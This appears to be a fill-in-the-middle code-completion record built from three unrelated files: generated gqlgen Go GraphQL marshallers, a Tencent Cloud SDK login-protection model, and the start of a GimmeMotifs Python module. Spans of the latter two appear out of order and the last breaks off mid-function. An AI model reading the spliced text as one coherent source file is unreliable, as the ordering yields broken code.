func (ec *executionContext) unmarshalNCreateIcmpCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateIcmpCheckInput(ctx context.Context, v interface{}) (models.CreateIcmpCheckInput, error) {
res, err := ec.unmarshalInputCreateIcmpCheckInput(ctx, v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) unmarshalNCreateTcpCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateTCPCheckInput(ctx context.Context, v interface{}) (models.CreateTCPCheckInput, error) {
res, err := ec.unmarshalInputCreateTcpCheckInput(ctx, v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) unmarshalNCreateTlsCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateTLSCheckInput(ctx context.Context, v interface{}) (models.CreateTLSCheckInput, error) {
res, err := ec.unmarshalInputCreateTlsCheckInput(ctx, v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalNDeleteResponse2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐDeleteResponse(ctx context.Context, sel ast.SelectionSet, v models.DeleteResponse) graphql.Marshaler {
return ec._DeleteResponse(ctx, sel, &v)
}
func (ec *executionContext) marshalNDeleteResponse2ᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐDeleteResponse(ctx context.Context, sel ast.SelectionSet, v *models.DeleteResponse) graphql.Marshaler {
if v == nil {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
return ec._DeleteResponse(ctx, sel, v)
}
func (ec *executionContext) unmarshalNID2string(ctx context.Context, v interface{}) (string, error) {
res, err := graphql.UnmarshalID(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalNID2string(ctx context.Context, sel ast.SelectionSet, v string) graphql.Marshaler {
res := graphql.MarshalID(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) unmarshalNInt2int(ctx context.Context, v interface{}) (int, error) {
res, err := graphql.UnmarshalInt(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalNInt2int(ctx context.Context, sel ast.SelectionSet, v int) graphql.Marshaler {
res := graphql.MarshalInt(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) unmarshalNString2string(ctx context.Context, v interface{}) (string, error) {
res, err := graphql.UnmarshalString(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalNString2string(ctx context.Context, sel ast.SelectionSet, v string) graphql.Marshaler {
res := graphql.MarshalString(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) unmarshalNTime2timeᚐTime(ctx context.Context, v interface{}) (time.Time, error) {
res, err := graphql.UnmarshalTime(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalNTime2timeᚐTime(ctx context.Context, sel ast.SelectionSet, v time.Time) graphql.Marshaler {
res := graphql.MarshalTime(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) marshalN__Directive2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐDirective(ctx context.Context, sel ast.SelectionSet, v introspection.Directive) graphql.Marshaler {
return ec.___Directive(ctx, sel, &v)
}
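// Non-null list marshalers share this pattern: each element gets its own
// FieldContext carrying its index, and elements are marshaled in parallel
// goroutines coordinated by a WaitGroup. The isLen1 check is a fast path
// that skips goroutine and WaitGroup overhead for single-element lists; a
// panic in any element nils out the whole result.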
func (ec *executionContext) marshalN__Directive2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐDirectiveᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.Directive) graphql.Marshaler {
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__Directive2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐDirective(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) unmarshalN__DirectiveLocation2string(ctx context.Context, v interface{}) (string, error) {
res, err := graphql.UnmarshalString(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalN__DirectiveLocation2string(ctx context.Context, sel ast.SelectionSet, v string) graphql.Marshaler {
res := graphql.MarshalString(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
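// Per the GraphQL spec's list input coercion, a single non-list value is
// accepted where a list is expected and is wrapped into a one-element slice
// before each element is unmarshaled with its index on the error path.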
func (ec *executionContext) unmarshalN__DirectiveLocation2ᚕstringᚄ(ctx context.Context, v interface{}) ([]string, error) {
var vSlice []interface{}
if v != nil {
if tmp1, ok := v.([]interface{}); ok {
vSlice = tmp1
} else {
vSlice = []interface{}{v}
}
}
var err error
res := make([]string, len(vSlice))
for i := range vSlice {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithIndex(i))
res[i], err = ec.unmarshalN__DirectiveLocation2string(ctx, vSlice[i])
if err != nil {
return nil, err
}
}
return res, nil
}
func (ec *executionContext) marshalN__DirectiveLocation2ᚕstringᚄ(ctx context.Context, sel ast.SelectionSet, v []string) graphql.Marshaler {
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__DirectiveLocation2string(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalN__EnumValue2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐEnumValue(ctx context.Context, sel ast.SelectionSet, v introspection.EnumValue) graphql.Marshaler {
return ec.___EnumValue(ctx, sel, &v)
}
func (ec *executionContext) marshalN__Field2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐField(ctx context.Context, sel ast.SelectionSet, v introspection.Field) graphql.Marshaler {
return ec.___Field(ctx, sel, &v)
}
func (ec *executionContext) marshalN__InputValue2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValue(ctx context.Context, sel ast.SelectionSet, v introspection.InputValue) graphql.Marshaler {
return ec.___InputValue(ctx, sel, &v)
}
func (ec *executionContext) marshalN__InputValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValueᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.InputValue) graphql.Marshaler {
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__InputValue2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValue(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalN__Type2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx context.Context, sel ast.SelectionSet, v introspection.Type) graphql.Marshaler {
return ec.___Type(ctx, sel, &v)
}
func (ec *executionContext) marshalN__Type2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐTypeᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.Type) graphql.Marshaler {
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__Type2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalN__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx context.Context, sel ast.SelectionSet, v *introspection.Type) graphql.Marshaler {
if v == nil {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
return ec.___Type(ctx, sel, v)
}
func (ec *executionContext) unmarshalN__TypeKind2string(ctx context.Context, v interface{}) (string, error) {
res, err := graphql.UnmarshalString(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalN__TypeKind2string(ctx context.Context, sel ast.SelectionSet, v string) graphql.Marshaler {
res := graphql.MarshalString(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) unmarshalOBoolean2bool(ctx context.Context, v interface{}) (bool, error) {
res, err := graphql.UnmarshalBoolean(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalOBoolean2bool(ctx context.Context, sel ast.SelectionSet, v bool) graphql.Marshaler {
return graphql.MarshalBoolean(v)
}
func (ec *executionContext) unmarshalOBoolean2ᚖbool(ctx context.Context, v interface{}) (*bool, error) {
if v == nil {
return nil, nil
}
res, err := graphql.UnmarshalBoolean(v)
return &res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalOBoolean2ᚖbool(ctx context.Context, sel ast.SelectionSet, v *bool) graphql.Marshaler {
if v == nil {
return graphql.Null
}
return graphql.MarshalBoolean(*v)
}
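// An O-prefixed slice with a trailing ᚄ is an optional list of non-null
// elements: a nil slice marshals to graphql.Null, but each present element
// is delegated to the non-null element marshaler.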
func (ec *executionContext) marshalOCheck2ᚕgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheckᚄ(ctx context.Context, sel ast.SelectionSet, v []models.Check) graphql.Marshaler {
if v == nil {
return graphql.Null
}
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalNCheck2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheck(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalOCheckExecution2ᚕᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheckExecutionᚄ(ctx context.Context, sel ast.SelectionSet, v []*models.CheckExecution) graphql.Marshaler {
if v == nil {
return graphql.Null
}
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalNCheckExecution2ᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheckExecution(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalOPollResult2ᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐPollResult(ctx context.Context, sel ast.SelectionSet, v *models.PollResult) graphql.Marshaler {
if v == nil {
return graphql.Null
}
return ec._PollResult(ctx, sel, v)
}
func (ec *executionContext) unmarshalOString2string(ctx context.Context, v interface{}) (string, error) {
res, err := graphql.UnmarshalString(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalOString2string(ctx context.Context, sel ast.SelectionSet, v string) graphql.Marshaler {
return graphql.MarshalString(v)
}
func (ec *executionContext) unmarshalOString2ᚖstring(ctx context.Context, v interface{}) (*string, error) {
if v == nil {
return nil, nil
}
res, err := graphql.UnmarshalString(v)
return &res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalOString2ᚖstring(ctx context.Context, sel ast.SelectionSet, v *string) graphql.Marshaler {
if v == nil {
return graphql.Null
}
return graphql.MarshalString(*v)
}
func (ec *executionContext) unmarshalOTime2ᚖtimeᚐTime(ctx context.Context, v interface{}) (*time.Time, error) {
if v == nil {
return nil, nil
}
res, err := graphql.UnmarshalTime(v)
return &res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalOTime2ᚖtimeᚐTime(ctx context.Context, sel ast.SelectionSet, v *time.Time) graphql.Marshaler {
if v == nil {
return graphql.Null
}
return graphql.MarshalTime(*v)
}
func (ec *executionContext) marshalO__EnumValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐEnumValueᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.EnumValue) graphql.Marshaler {
if v == nil {
return graphql.Null
}
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__EnumValue2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐEnumValue(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalO__Field2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐFieldᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.Field) graphql.Marshaler {
if v == nil {
return graphql.Null
}
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__Field2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐField(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalO__InputValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValueᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.InputValue) graphql.Marshaler {
if v == nil {
return graphql.Null
}
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__InputValue2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValue(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalO__Schema2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐSchema(ctx context.Context, sel ast.SelectionSet, v *introspection.Schema) graphql.Marshaler {
if v == nil {
return graphql.Null
}
return ec.___Schema(ctx, sel, v)
}
func (ec *executionContext) marshalO__Type2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐTypeᚄ(ctx context.Context, sel ast.SelectionSet, v []introspection.Type) graphql.Marshaler {
if v == nil {
return graphql.Null
}
ret := make(graphql.Array, len(v))
var wg sync.WaitGroup
isLen1 := len(v) == 1
if !isLen1 {
wg.Add(len(v))
}
for i := range v {
i := i
fc := &graphql.FieldContext{
Index: &i,
Result: &v[i],
}
ctx := graphql.WithFieldContext(ctx, fc)
f := func(i int) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = nil
}
}()
if !isLen1 {
defer wg.Done()
}
ret[i] = ec.marshalN__Type2githubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, sel, v[i])
}
if isLen1 {
f(i)
} else {
go f(i)
}
}
wg.Wait()
return ret
}
func (ec *executionContext) marshalO__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx context.Context, sel ast.SelectionSet, v *introspection.Type) graphql.Marshaler {
if v == nil {
return graphql.Null
}
return ec.___Type(ctx, sel, v)
}
// endregion ***************************** type.gotpl *****************************
| NewExecutableSchema |
models.py | # -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings
from tencentcloud.common.abstract_model import AbstractModel
class QueryLoginProtectionRequest(AbstractModel):
"""QueryLoginProtection请求参数结构体
"""
def __init__(self):
r"""
:param LoginIp: Public (WAN) IP the login came from.
:type LoginIp: str
:param Uid: User ID. Different accountType values correspond to different user IDs: for QQ, pass the corresponding openid; for WeChat users, the corresponding openid/unionid; for phone numbers, the user's real phone number (e.g. 13123456789).
:type Uid: str
:param LoginTime: Login timestamp, in seconds.
:type LoginTime: str
:param AccountType: User account type (QQ and WeChat open accounts require a support ticket so Tencent Cloud can review eligibility):
1: QQ open account.
2: WeChat open account.
4: phone number.
0: other.
10004: MD5 of a phone number.
:type AccountType: str
:param AppIdU: Required when accountType is a QQ or WeChat open account; the AppID assigned by QQ or WeChat to the website or application, used to uniquely identify it.
:type AppIdU: str
:param AssociateAccount: When accountType is a QQ or WeChat open account, identifies the business-side account ID associated with the QQ or WeChat user after login.
:type AssociateAccount: str
:param NickName: Nickname, UTF-8 encoded.
:type NickName: str
:param PhoneNumber: Phone number in the form country code-number, e.g. 0086-15912345687 (no + sign before 0086).
:type PhoneNumber: str
:param EmailAddress: User email address (not auto-generated by the system).
:type EmailAddress: str
:param RegisterTime: Public (WAN) IP the registration came from.
:type RegisterTime: str
:param Address: Address.
:type Address: str
:param CookieHash: Double hash of the cookie in the user's HTTP request; it only needs to be identical for identical cookies.
:type CookieHash: str
:param LoginSource: Login source:
0: other
1: PC web page
2: mobile page
3: app
4: WeChat official account
:type LoginSource: str
:param LoginType: Login method:
0: other
1: manual account/password entry
2: dynamic SMS password login
3: QR code scan login
:type LoginType: str
:param Referer: Referer value of the user's HTTP request.
:type Referer: str
:param JumpUrl: Page redirected to after a successful login.
:type JumpUrl: str
:param UserAgent: userAgent of the user's HTTP request.
:type UserAgent: str
:param XForwardedFor: x_forward_for of the user's HTTP request.
:type XForwardedFor: str
:param MouseClickCount: Number of mouse clicks during the user's session.
:type MouseClickCount: str
:param KeyboardClickCount: Number of keystrokes during the user's session.
:type KeyboardClickCount: str
:param Result: Registration result:
0: failure
1: success
:type Result: str
:param Reason: Failure reason:
0: other
1: parameter error
2: account conflict
3: verification error
:type Reason: str
:param LoginSpend: Time spent logging in, in seconds.
:type LoginSpend: str
:param MacAddress: MAC address or unique device identifier.
:type MacAddress: str
:param VendorId: Phone manufacturer ID; include it when registering from a phone.
:type VendorId: str
:param AppVersion: App client version.
:type AppVersion: str
:param Imei: Phone device number (IMEI).
:type Imei: str
:param BusinessId: Business ID. When a website or application uses this service in several lines of business, this ID separates their statistics.
:type BusinessId: str
:param WxSubType: 1: WeChat official account
2: WeChat mini program
:type WxSubType: str
:param RandNum: Random number for the token signature; required for WeChat mini programs, 16 characters recommended.
:type RandNum: str
:param WxToken: For WeChat mini programs, the value obtained by signing the random number randNum with session_key as the key (hmac_sha256 signature algorithm).
For WeChat official accounts or third-party login, the authorized access_token (note: not the ordinary access_token; see the official WeChat documentation).
:type WxToken: str
"""
self.LoginIp = None
self.Uid = None
self.LoginTime = None
self.AccountType = None
self.AppIdU = None
self.AssociateAccount = None
self.NickName = None
self.PhoneNumber = None
self.EmailAddress = None
self.RegisterTime = None
self.Address = None
self.CookieHash = None
self.LoginSource = None
self.LoginType = None
self.Referer = None
self.JumpUrl = None
self.UserAgent = None
self.XForwardedFor = None
self.MouseClickCount = None
self.KeyboardClickCount = None
self.Result = None
self.Reason = None
self.LoginSpend = None
self.MacAddress = None
self.VendorId = None
self.AppVersion = None
self.Imei = None
self.BusinessId = None
self.WxSubType = None
self.RandNum = None
self.WxToken = None
def _deserialize(self, params):
self.LoginIp = params.get("LoginIp")
self.Uid = params.get("Uid")
self.LoginTime = params.get("LoginTime")
self.AccountType = params.get("AccountType")
self.AppIdU = params.get("AppIdU")
self.AssociateAccount = params.get("AssociateAccount")
self.NickName = params.get("NickName")
self.PhoneNumber = params.get("PhoneNumber")
self.EmailAddress = params.get("EmailAddress")
self.RegisterTime = params.get("RegisterTime")
self.Address = params.get("Address")
self.CookieHash = params.get("CookieHash")
self.LoginSource = params.get("LoginSource")
self.LoginType = params.get("LoginType")
self.Referer = params.get("Referer")
self.JumpUrl = params.get("JumpUrl")
self.UserAgent = params.get("UserAgent")
self.XForwardedFor = params.get("XForwardedFor")
self.MouseClickCount = params.get("MouseClickCount")
self.KeyboardClickCount = params.get("KeyboardClickCount")
self.Result = params.get("Result")
self.Reason = params.get("Reason")
self.LoginSpend = params.get("LoginSpend")
self.MacAddress = params.get("MacAddress")
self.VendorId = params.get("VendorId")
self.Ap | login.
Note: this field may return null, meaning no valid value could be obtained.
:type RootId: str
:param RequestId: Unique request ID, returned with every request. The RequestId of the failing request is needed when troubleshooting.
:type RequestId: str
"""
self.CodeDesc = None
self.AssociateAccount = None
self.LoginTime = None
self.Uid = None
self.LoginIp = None
self.Level = None
self.RiskType = None
self.RootId = None
self.RequestId = None
def _deserialize(self, params):
self.CodeDesc = params.get("CodeDesc")
self.AssociateAccount = params.get("AssociateAccount")
self.LoginTime = params.get("LoginTime")
self.Uid = params.get("Uid")
self.LoginIp = params.get("LoginIp")
self.Level = params.get("Level")
self.RiskType = params.get("RiskType")
self.RootId = params.get("RootId")
self.RequestId = params.get("RequestId") | pVersion = params.get("AppVersion")
self.Imei = params.get("Imei")
self.BusinessId = params.get("BusinessId")
self.WxSubType = params.get("WxSubType")
self.RandNum = params.get("RandNum")
self.WxToken = params.get("WxToken")
member_set = set(params.keys())
for name, value in vars(self).items():
if name in member_set:
member_set.remove(name)
if len(member_set) > 0:
warnings.warn("%s fields are useless." % ",".join(member_set))
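# Note (explanatory comment, not in the original SDK): _deserialize() diffs
# the keys supplied by the caller against the attributes declared in
# __init__ and warns about any leftovers, so a params dict containing an
# unsupported key such as {"LoginIp": "1.2.3.4", "Foo": 1} triggers
# UserWarning: "Foo fields are useless."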
class QueryLoginProtectionResponse(AbstractModel):
"""QueryLoginProtection返回参数结构体
"""
def __init__(self):
r"""
:param CodeDesc: Business-side error code. Returns Success on success; on failure, returns the specific business error reason. Shared output fields such as "RequestId" are not filled in here; the remaining fields (AssociateAccount, LoginTime, Uid, LoginIp, Level, RiskType) are described below.
Note: this field may return null, meaning no valid value could be obtained.
:type CodeDesc: str
:param AssociateAccount: When accountType is a QQ or WeChat open account, identifies the business-side account ID associated with the QQ or WeChat user after login.
Note: this field may return null, meaning no valid value could be obtained.
:type AssociateAccount: str
:param LoginTime: Operation time.
Note: this field may return null, meaning no valid value could be obtained.
:type LoginTime: str
:param Uid: User ID. Different accountType values correspond to different user IDs: for QQ, pass the corresponding openid; for WeChat users, the corresponding openid/unionid; for phone numbers, the user's real phone number (e.g. 13123456789).
Note: this field may return null, meaning no valid value could be obtained.
:type Uid: str
:param LoginIp: Login IP.
Note: this field may return null, meaning no valid value could be obtained.
:type LoginIp: str
:param Level: 0: no malice detected.
1 - 4: malice level from low to high.
:type Level: int
:param RiskType: Risk type.
:type RiskType: list of int
:param RootId: When accountType is a QQ or WeChat open account, identifies the business-side account ID associated with the QQ or WeChat user |
prediction.py | # Copyright (c) 2009-2019 Simon van Heeringen <[email protected]>
#
# This module is free software. You can redistribute it and/or modify it under
# the terms of the MIT License, see the file COPYING included with this
# distribution.
"""Parallel prediction of sequence motifs """
# Python imports
import sys
import logging
try:
import _thread as thread
except ImportError:
import thread
from time import sleep
import inspect
from multiprocessing import Pool
# GimmeMotifs imports
from gimmemotifs import tools as tool_classes
from gimmemotifs.config import MotifConfig, parse_denovo_params
from gimmemotifs.fasta import Fasta
from gimmemotifs import mytmpdir
from gimmemotifs.stats import calc_stats
logger = logging.getLogger("gimme.prediction")
try:
import copy_reg
import types
def _pickle_method(m):
if m.im_self is None:
return getattr, (m.im_class, m.im_func.func_name)
else:
return getattr, (m.im_self, m.im_func.func_name)
copy_reg.pickle(types.MethodType, _pickle_method)
except Exception:
pass
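# The try/except above is a Python 2 compatibility shim (explanatory comment,
# not in the original module): multiprocessing must pickle bound methods when
# sending work to worker processes, which Python 2's pickle cannot do
# natively, so _pickle_method teaches copy_reg how. On Python 3 the import of
# copy_reg fails and the shim is skipped, since methods pickle out of the box.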
def mp_calc_stats(motifs, fg_fa, bg_fa, zscore, gc, genome, bg_name=None):
"""Parallel calculation of motif statistics."""
try:
stats = calc_stats(
motifs=motifs, | bg_file=bg_fa,
ncpus=1,
zscore=zscore,
gc=gc,
genome=genome,
)
except Exception as e:
sys.stderr.write("ERROR: {}\n".format(str(e)))
stats = {}
raise
if not bg_name:
bg_name = "default"
return bg_name, stats
def _run_tool(job_name, t, fastafile, params):
"""Parallel motif prediction."""
try:
result = t.run(fastafile, params, mytmpdir())
except Exception as e:
result = ([], "", "{} failed to run: {}".format(job_name, e))
return job_name, result
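# Illustrative sketch (not part of the original module) of how the helpers
# above are wired together with multiprocessing.Pool: _run_tool executes in a
# worker process and its (job_name, result) return value is handed to the
# callback in the parent process. The file name and tool object below are
# hypothetical.
#
# pool = Pool(2)
# result = PredictionResult("motifs.pfm") # hypothetical output path
# pool.apply_async(_run_tool, ("MEME", meme_tool, "input.fa", {}),
# callback=result.add_motifs)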
class PredictionResult(object):
"""Store predicted motifs and calculate statistics."""
def __init__(
self,
outfile,
genome=None,
fg_file=None,
background=None,
gc=False,
do_counter=True,
job_server=None,
):
self.lock = thread.allocate_lock()
self.motifs = []
self.finished = []
self.stats = {}
self.stat_jobs = []
self.outfile = outfile
self.genome = genome
if job_server:
self.job_server = job_server
else:
self.job_server = Pool(2)
self.counter = 0
self.do_counter = do_counter
open(outfile, "w").close()
if fg_file and background:
self.fg_fa = Fasta(fg_file)
self.background = dict(
[(bg, Fasta(fname)) for bg, fname in background.items()]
)
self.do_stats = True
self.gc = gc
self.zscore = self.gc
if self.gc:
if genome is None:
raise ValueError(
"Need a genome when calculating GC% zscores for motif statistics"
)
else:
self.genome = genome
else:
self.do_stats = False
def add_motifs(self, args):
"""Add motifs to the result object."""
self.lock.acquire()
# Callback function for motif programs
if args is None or len(args) != 2 or len(args[1]) != 3:
try:
